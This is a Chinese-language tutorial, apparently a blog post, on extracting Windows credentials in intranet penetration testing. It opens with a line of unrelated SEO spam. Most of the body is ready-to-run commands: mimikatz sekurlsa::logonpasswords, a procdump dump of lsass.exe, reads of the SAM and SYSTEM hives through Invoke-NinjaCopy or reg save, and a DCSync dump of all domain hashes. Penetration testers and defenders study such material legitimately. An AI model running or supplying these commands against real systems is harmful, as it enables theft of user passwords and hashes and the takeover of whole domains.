做网站和做网页一样吗,免费给别人开发网站,sem竞价代运营,windows优化大师和鲁大师文章目录 一、获取域内单机密码和hash1.1 在线读取lsass进程内存1.2 离线读取lsass.exe进程内存1.3 在线读取本地SAM文件1.4 离线读取本地SAM文件 二、域hash获取三、windows凭据导出 一、获取域内单机密码和hash
在windows中#xff0c;SAM文件是windows用户的账户数据库SAM文件是windows用户的账户数据库位于系统的%SystemRoot%\System\Config目录中所有本地用户的用户名、密码hash等信息都存储在这个文件中。用户输入密码登录时用户输入的明文密码会被转化为hash然后再与SAM文件中的hash值对比若相同则认证成功。lsass.exe是windows的一个系统进程用于实现系统的安全机制主要用于本地安全和登录策略。在通常情况下用户输入密码登录后登录的域名、用户名和登录凭据等信息会存储在lsass.exe的进程空间中用户的明文密码经过WDigest和Tspkg模块调用后会对其使用可逆的算法进行加密并存储在内存中。
用来获取主机的用户密码和hash的工作大多通过读取SAM文件或者访问lsass.exe进程的内存数据等操作来实现。这些操作大多需要管理员权限
1.1 在线读取lsass进程内存
mimikatz.exe privilege::debug sekurlsa::logonpasswords full exit
# privilege::debug提升至Debugprivlege权限
# sekurlsa::logonpasswords full导出用户凭证如果出现以下错误需要用管理员身份打开cmd命令行。 1.2 离线读取lsass.exe进程内存
除了在线读取外还可以直接将lsass.exe的进程内存转存将内存文件导出到本地后使用mimikatz.exe进行离线读取。这里使用procdump实现离线转存。
procdump.exe -accepteula -ma lsass.exe lsass.dmp # 将lsass.exe进程转存
mimikatz.exe sekurl::minidump lsass.dmp sekurlsa::logonpasswords full exit
# sekurl::minidump lsass.dump用于加载文件
# sekurlsa::logonpasswords full导出用户凭证1.3 在线读取本地SAM文件
读取SAM文件中保存的用户登录凭证可以导出当前系统中所有本地用户的hash。
mimikatz.exe privilege::debug token::elevate lsadump::sam exit
# privilege::debug提升至Debugprivlege权限
# token::elevate提升到system权限
# lsadump::sam读取本地sam文件1.4 离线读取本地SAM文件
离线读取就是将SAM文件导出使用mimikatz加载并读取其中用户的登录凭证等信息。注意为了提高SAM文件的安全性以防止被离线破解windows会对SAM文件使用密钥进行加密这个密钥存储在SYSTEM文件中与SAM文件在同一目录下。
通过Invoke-NinjaCopy.psl脚本实现 在目标主机上导出SAM和SYSTEM文件因为系统在运行时这两个文件被锁定可以使用PowerSploit项目中的Invoke-NinjaCopy.psl脚本实现。 管理员身份启动powershell在域环境中需要域管理员密码才能启动。 Import-Module .\Invoke-NinjaCopy.psl
Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Temp\SAM
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination C:\Temp\SYSTEM出现以下错误运行Set-ExecutionPolicy Unrestricted -Scope CurrrentUser。 # 使用mimikatz加载并读取SAM中的用户凭证信息
mimikatz.exe lsadump::sam /sam:C:\SAM /system:C:\SYSTEM exit通过注册表实现 需要管理员权限 # 使用管理员权限通过保存注册表的方式导出
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive# 使用mimikatz加载并读取SAM中的用户凭证
mimikatz.exe lsadump::sam /sam:sam.hive /system:system.hive exit二、域hash获取
lsadump::dcsync /domain:domain /all /csv # 导出域内所有用户的信息(包括哈希值)参考资料内网渗透测试DCSync 攻击技术的利用
三、windows凭据导出
Invoke-WCMDump一个用于Windows环境的凭据提取PowerShell模块能解密LSA和DPAPI存储的敏感信息以及捕获Wdigest明文密码。 待续…
